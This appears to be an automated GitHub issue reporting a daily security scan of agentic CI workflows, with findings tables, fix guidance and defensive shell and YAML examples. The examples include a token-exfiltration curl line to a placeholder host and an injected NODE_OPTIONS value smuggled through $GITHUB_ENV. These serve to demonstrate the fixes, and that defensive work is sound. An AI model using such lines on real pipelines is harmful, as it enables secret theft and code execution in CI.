
[static-analysis] Report - 2026-06-09 #38047

Description

@github-actions

🔍 Static Analysis Report — 2026-06-09

Daily scan of 247 compiled agentic workflows with zizmor, poutine, actionlint, and runner-guard. Totals are essentially flat versus the last scan (2026-06-07): runner-guard unchanged at 314, poutine unchanged at 24, zizmor down 1, actionlint up 27; the actionlint increase tracks the 4 newly added workflows rather than any new vulnerability class. No new GitHub issues were created: every Critical/High runner-guard finding maps to an already-closed issue for the same rule + file (see Runner-Guard Analysis).

Findings by Tool

| Tool | Total | Critical | High | Medium | Low | Info |
|---|---|---|---|---|---|---|
| zizmor (security) | 74 | 0 | 1 | 2 | 31 | 40 |
| poutine (supply chain) | 24 | 0 | 0 | 0 | 24 | |
| actionlint (linting) | 1524 | | | | | |
| runner-guard (taint) | 314 | 0 | 304 | 10 | | |
  • Workflows scanned: 247
  • Workflows with runner-guard findings: 11
  • Issues created this run: 0 (all High findings are duplicates of closed issues)

Top Priority Issues

1. RGS-004 — Comment-Triggered Workflow Without Author Authorization Check

  • Tool: runner-guard · Severity: High · Count: 288
  • Affected: q, dev-hawk, ai-moderator (all covered by closed issues; see Runner-Guard Analysis)

2. zizmor github-env (High) — dangerous use of environment file

  • Tool: zizmor · Severity: High · Count: 1
  • Affected: dev-hawk.lock.yml:1714 (persistent, ~18 consecutive days since 2026-05-23)
  • Impact: Writing dynamic values to $GITHUB_ENV can inject env vars (NODE_OPTIONS, PATH, ...) into later steps. The only genuinely persistent High finding not covered by a per-file issue; recommend fixing at the compiler/source .md level.

3. RGS-012 / RGS-018 (High) — secret exfiltration & suspicious payload patterns

  • Tool: runner-guard · Severity: High · Count: 10 + 6
  • Affected (RGS-012): daily-byok-ollama-test, daily-model-inventory, daily-multi-device-docs-tester, docs-noob-tester, visual-regression-checker
  • Affected (RGS-018): copilot-setup-steps, daily-byok-ollama-test, daily-cli-performance, daily-sentrux-report, smoke-claude, smoke-codex
  • Impact: Outbound curl/wget to non-GitHub domains in secret-bearing jobs (RGS-012) and curl | sh install patterns (RGS-018). All covered by closed issues (see below).
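The RGS-018 pattern and its fix, side by side, as an added example (not code from the gh-aw workflows the report scans). The flagged form pipes whatever the server returns straight into sh; the hardened form fetches to a file, checks it against a digest pinned in the reviewed workflow source, and only then executes it, so a silently changed upstream installer fails closed. The "download" is simulated by copying a local file, and the installer, URL and tampered copy are constructed here so the script runs offline. For RGS-012 the complementary control is to run such fetches in a job that carries no secrets at all.

```shell
#!/bin/sh
# Added example: RGS-018 (curl | sh) beside a pinned-digest fetch-then-run.
# Everything below (installer, URL, tampered copy) is constructed for illustration.

# --- Flagged form (do not use): executes an unreviewed, unpinned script.
#   curl -fsSL https://example.invalid/install.sh | sh

# fetch_to_file URL DEST: stands in for `curl -fsSL "$URL" -o "$DEST"`.
# It copies from the local path encoded in a file:// URL so the example is offline.
fetch_to_file() {
  src="${1#file://}"
  cp "$src" "$2"
}

# sha256_of FILE: portable digest (sha256sum on Linux, shasum on macOS).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# verified_install URL EXPECTED_SHA256: runs the script only if its digest
# matches the pinned value; otherwise returns 1 and executes nothing.
verified_install() {
  url="$1"; expected="$2"
  tmp="$(mktemp)"
  fetch_to_file "$url" "$tmp" || { rm -f "$tmp"; return 1; }
  actual="$(sha256_of "$tmp")"
  if [ "$actual" != "$expected" ]; then
    echo "digest mismatch for $url: expected $expected got $actual" >&2
    rm -f "$tmp"
    return 1
  fi
  sh "$tmp"
  rc=$?
  rm -f "$tmp"
  return $rc
}

# Constructed stand-in for the upstream installer.
INSTALLER="$(mktemp)"
printf '%s\n' '#!/bin/sh' 'echo "installer ran"' > "$INSTALLER"
# In a real workflow this is a literal hex string committed with the source
# after review; it is computed here only because the installer is generated above.
PINNED_SHA256="$(sha256_of "$INSTALLER")"

# Tampered copy: one appended line, which the pinned digest rejects.
TAMPERED="$(mktemp)"
cp "$INSTALLER" "$TAMPERED"
echo 'curl -s https://example.invalid/exfil?t=$SOME_TOKEN' >> "$TAMPERED"

run_pinned()   { verified_install "file://$INSTALLER" "$PINNED_SHA256"; }
run_tampered() { verified_install "file://$TAMPERED" "$PINNED_SHA256"; }

run_pinned && echo "pinned: ok"
run_tampered || echo "tampered: rejected"
```

The digest check buys nothing if the pinned value is itself fetched at run time; it must live in the workflow source (or the gh-aw .md that compiles to it) where a reviewer sees any change to it.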

Clustered Findings by Tool and Type

Zizmor Security Findings

| Issue Type | Severity | Count | Notes |
|---|---|---|---|
| template-injection | Informational | 39 | code injection via template expansion |
| obfuscation | Low | 27 | ${{ '' }} placeholder pattern in generated lock files |
| template-injection | Low | 4 | |
| github-env | High | 1 | dev-hawk.lock.yml:1714 (persistent) |
| excessive-permissions | Medium | 1 | dependabot-repair.lock.yml:381 |
| artipacked | Medium | 1 | daily-geo-optimizer.lock.yml:1514 |
| superfluous-actions | Informational | 1 | smoke-codex.lock.yml:2190 |

Poutine Supply Chain Findings

| Issue Type | Severity | Count | Affected Workflows |
|---|---|---|---|
| untrusted_checkout_exec | error (Low) | 12 | smoke-workflow-call, smoke-workflow-call-with-inputs, dependabot-worker (4 each) |
| github_action_from_unverified_creator_used | note | 8 | smoke-codex, mcp-inspector, link-check, super-linter, hippo-embed, dataflow-pr-discussion-dataset, copilot-setup-steps |
| unverified_script_exec | note | 3 | smoke-codex (trufflehog), daily-byok-ollama-test (ollama), copilot-setup-steps |
| pr_runs_on_self_hosted | warning | 1 | smoke-copilot-arm |

Actionlint Linting Issues

| Issue Type | Count | Notes |
|---|---|---|
| shellcheck | 975 | mostly SC2016 / SC2086 in generated run: blocks |
| syntax-check | 410 | queue: max under concurrency + unexpected keys (gh-aw feature actionlint doesn't model) |
| permissions | 117 | unknown scope copilot-requests (valid GitHub scope, not yet in actionlint) |
| expression | 22 | undefined property refs in if: conditions |

Note: the bulk of actionlint and zizmor obfuscation findings are artifacts of gh-aw's own generated .lock.yml output (newer GitHub features actionlint doesn't recognize, intentional ${{ '' }} placeholders) rather than authored vulnerabilities.

Runner-Guard Taint Analysis Findings

Runner-Guard Score: not emitted by scanner this run. High: 304 · Medium: 10.

| Rule ID | Name | Severity | Count | Affected Workflows |
|---|---|---|---|---|
| RGS-004 | Comment-Triggered Workflow w/o Author Auth Check | High | 288 | q, dev-hawk, ai-moderator |
| RGS-012 | Secret Exfiltration via Outbound HTTP Request | High | 10 | daily-byok-ollama-test, daily-model-inventory, daily-multi-device-docs-tester, docs-noob-tester, visual-regression-checker |
| RGS-018 | Suspicious Payload Execution Pattern | High | 6 | copilot-setup-steps, daily-byok-ollama-test, daily-cli-performance, daily-sentrux-report, smoke-claude, smoke-codex |
| RGS-005 | Excessive Permissions on Untrusted Trigger | Medium | 8 | agentic_commands, ai-moderator, q |
| RGS-019 | Step Output Interpolated in run Block | Medium | 1 | error-message-lint |
| RGS-007 | Unpinned Third-Party Action Using Mutable Tag | Medium | 1 | aoai-endpoint-smoke-test |

Issues created: none — see Runner-Guard Analysis for deduplication rationale.

Runner-Guard Analysis

All High-severity runner-guard findings were checked for existing GitHub issues (open and closed) by rule ID + affected file. Every one maps to an already-closed [static-analysis] issue, so per the deduplication policy (closed rule+file → skip) no new issues were created and no comments were posted (no open issues exist).

| Rule + File | Closed issue(s) covering it |
|---|---|
| RGS-004 · q / dev-hawk / ai-moderator | #29883 (explicit file list), #30284, #30077, #29460 |
| RGS-012 · daily-byok-ollama-test | #35652, #30534 |
| RGS-012 · daily-model-inventory | #30079, #30776 |
| RGS-012 · daily-multi-device-docs-tester | #33477 |
| RGS-012 · docs-noob-tester / visual-regression-checker | #29885, #30947 |
| RGS-018 · copilot-setup-steps | #33476 |
| RGS-018 · daily-byok-ollama-test | #35653 |
| RGS-018 · daily-cli-performance / daily-sentrux-report / smoke-claude / smoke-codex | #29461 (36 wf), #30777 (35 wf), #30078 (37 wf), #30532 (34 wf) |

This recurring create-then-close cycle is itself documented in closed meta-issue #31043 ("Static-analysis RGS-* security issues recreated daily after closure (no dedup-by-rule)"). Honoring that, this run created 0 issues.

Fix Suggestion — zizmor github-env (High, persistent)

Issue: Dangerous write to $GITHUB_ENV in dev-hawk.lock.yml:1714 (persistent ~18 days).
Severity: High · Affected: 1 workflow (source .md / compiler template).

Prompt to Copilot Agent:

You are fixing a HIGH severity finding identified by zizmor (rule: github-env; docs: docs.zizmor.sh/redacted).

Vulnerability: A `run:` step writes a dynamically-computed value to `$GITHUB_ENV`.
If that value is attacker-influenced or contains newlines, an attacker can inject
additional environment variables (NODE_OPTIONS, LD_PRELOAD, PATH) into later steps,
leading to code execution.

Required fix:
1. Prefer step OUTPUTS scoped to a step id over global env injection.
2. If $GITHUB_ENV is required, sanitize the value (strip newlines) and write with a
   random heredoc delimiter; never interpolate untrusted ${{ ... }} directly.

Before:
  echo "VALUE=$(some_command)" >> "$GITHUB_ENV"

After:
  delim="EOF_$(openssl rand -hex 8)"   # unpredictable, so the value cannot contain the terminator line
  {
    echo "value<<${delim}"
    some_command
    echo "${delim}"
  } >> "$GITHUB_OUTPUT"

Because dev-hawk is a compiled .lock.yml, apply the fix in the source .md / shared
include that generates the offending step, then recompile.
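Why the newline matters, and why the heredoc delimiter has to be unpredictable, as an added example that is not part of the report or of the dev-hawk workflow. The script below contains a small parser that mimics the two forms of the runner's env-file grammar (NAME=value and NAME<<DELIM ... DELIM), writes a constructed attacker-controlled value through the flagged pattern and through the hardened one, and reports what a later step would see. The value, file paths and function names are all assumptions made for the example; the parser flattens multi-line values onto one line only so that the result is one line per variable (the real runner keeps the newlines).

```shell
#!/bin/sh
# Added example: $GITHUB_ENV newline injection versus a heredoc with a random
# delimiter. Nothing here is runner source; the parser is a reduced model.

# parse_env_file FILE: prints NAME=value, one per line, the way a later step
# would see the variables. Handles NAME=value and NAME<<DELIM ... DELIM.
parse_env_file() {
  file="$1"; delim=""; name=""; acc=""
  while IFS= read -r line || [ -n "$line" ]; do
    if [ -n "$delim" ]; then
      if [ "$line" = "$delim" ]; then
        printf '%s=%s\n' "$name" "$acc"   # heredoc closed: one variable
        delim=""; acc=""
      else
        acc="${acc}${acc:+ }${line}"     # display-only flattening of the body
      fi
      continue
    fi
    case "$line" in
      *"<<"*) name="${line%%"<<"*}"; delim="${line#*"<<"}" ;;
      *=*)    printf '%s\n' "$line" ;;
    esac
  done < "$file"
}

# Constructed untrusted input (think: a PR title or comment body). The second
# line is the injected assignment a later node-based step would honour.
ATTACKER_VALUE="$(printf 'release-1.2\nNODE_OPTIONS=--require /tmp/evil.js')"

# The pattern zizmor's github-env rule flags: the value goes in verbatim,
# so its embedded newline starts a second assignment line.
vulnerable_write() {
  echo "VALUE=$1" >> "$2"
}

# Hardened write: a heredoc whose terminator the attacker cannot predict, so
# no line of the value can close it early. Same shape works for $GITHUB_OUTPUT.
safe_write() {
  delim="EOF_$(od -An -N8 -tx1 /dev/urandom | tr -d ' \n')"
  {
    printf 'value<<%s\n' "$delim"
    printf '%s\n' "$1"
    printf '%s\n' "$delim"
  } >> "$2"
}

# count_vars WRITER: how many variables a consumer sees after WRITER runs.
count_vars() {
  f="$(mktemp)"
  "$1" "$ATTACKER_VALUE" "$f"
  parse_env_file "$f" | wc -l | tr -d ' '
  rm -f "$f"
}

# injected WRITER: "yes" if the smuggled NODE_OPTIONS reaches a consumer.
injected() {
  f="$(mktemp)"
  "$1" "$ATTACKER_VALUE" "$f"
  if parse_env_file "$f" | grep -q '^NODE_OPTIONS='; then echo yes; else echo no; fi
  rm -f "$f"
}

echo "vulnerable: vars=$(count_vars vulnerable_write) injected=$(injected vulnerable_write)"
echo "safe:       vars=$(count_vars safe_write) injected=$(injected safe_write)"
```

The random delimiter is what makes the heredoc safe; with a fixed `__EOF__` an attacker who can guess it closes the block and appends assignments exactly as in the single-line case. Stripping newlines before the write is the belt-and-braces option when the value is supposed to be single-line anyway.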

Historical Trends

| Date | Workflows | zizmor | poutine | actionlint | runner-guard |
|---|---|---|---|---|---|
| 2026-06-07 | 243 | 75 | 24 | 1497 | 314 |
| 2026-06-09 | 247 | 74 | 24 | 1524 | 314 |
| Δ | +4 | −1 | 0 | +27 | 0 |
  • New issue types: none.
  • Resolved issue types: none — the same rule classes persist.
  • Persistent High finding: zizmor github-env on dev-hawk (~18 consecutive days since 2026-05-23) — the one item worth a durable source-level fix.

Recommendations

  1. Immediate: Fix the persistent zizmor github-env High in the dev-hawk source workflow / compiler template (the only genuinely actionable, unresolved High).
  2. Short-term: Decide a policy for the recurring RGS-004/012/018 closed issues — either accept-and-suppress at the scanner config level or add author_association gating to q, dev-hawk, ai-moderator, so the scan stops re-flagging them.
  3. Tooling: Most actionlint (queue, copilot-requests) and zizmor obfuscation findings are gh-aw-generated-output artifacts — consider an allowlist/suppression so signal isn't drowned by ~1500 known-benign lines.
  4. Prevention: Keep the rule+file dedup against closed issues (this run honored it: 0 created) to avoid the daily-recreation churn documented in #31043 ([deep-report] Static-analysis RGS-* security issues recreated daily after closure (no dedup-by-rule)).
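What the "author_association gating" in recommendation 2 looks like in a workflow, as an added configuration fragment (not taken from q, dev-hawk or ai-moderator, whose compiled .lock.yml files are not on this page). The job name, the `/hawk` command prefix and the step body are assumptions; the gate itself is the `if:` on the job, evaluated before any step runs and before secrets are handed to steps.

```yaml
# Added example: comment-triggered job with an author-authorization gate.
# Weak form (what RGS-004 flags): the job below with no `if:` at all, so any
# GitHub account that can comment can start the agent.
on:
  issue_comment:
    types: [created]

permissions:
  contents: read
  issues: write

jobs:
  handle-command:
    # Only owners, org members and collaborators may trigger the agent.
    # CONTRIBUTOR and FIRST_TIME_CONTRIBUTOR are deliberately excluded:
    # anyone with a single merged PR holds CONTRIBUTOR.
    if: >-
      startsWith(github.event.comment.body, '/hawk') &&
      contains(fromJSON('["OWNER","MEMBER","COLLABORATOR"]'),
               github.event.comment.author_association)
    runs-on: ubuntu-latest
    steps:
      # Pass event data through env, never via ${{ }} inside run:, so the
      # comment body cannot become shell (the template-injection class above).
      - env:
          ASSOC: ${{ github.event.comment.author_association }}
          BODY: ${{ github.event.comment.body }}
        run: |
          echo "authorized as $ASSOC"
          printf '%s\n' "$BODY" | head -c 200
```

Because gh-aw compiles the `.lock.yml` from a source `.md`, the gate belongs in the source (or the shared include that emits the job), otherwise the next compile drops it and the scan re-flags the file.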

Next Steps

  • Apply the github-env source fix for dev-hawk
  • Triage policy for RGS-004/012/018 recurring closures (suppress vs. fix)
  • Add actionlint/zizmor suppressions for known gh-aw generated patterns
  • Keep closed-issue dedup to prevent issue churn

Generated by 📊 Static Analysis Report · 274.6 AIC · ⌖ 35.5 AIC · ⊞ 10.2K

  • expires on Jun 15, 2026, 10:13 PM UTC-08:00
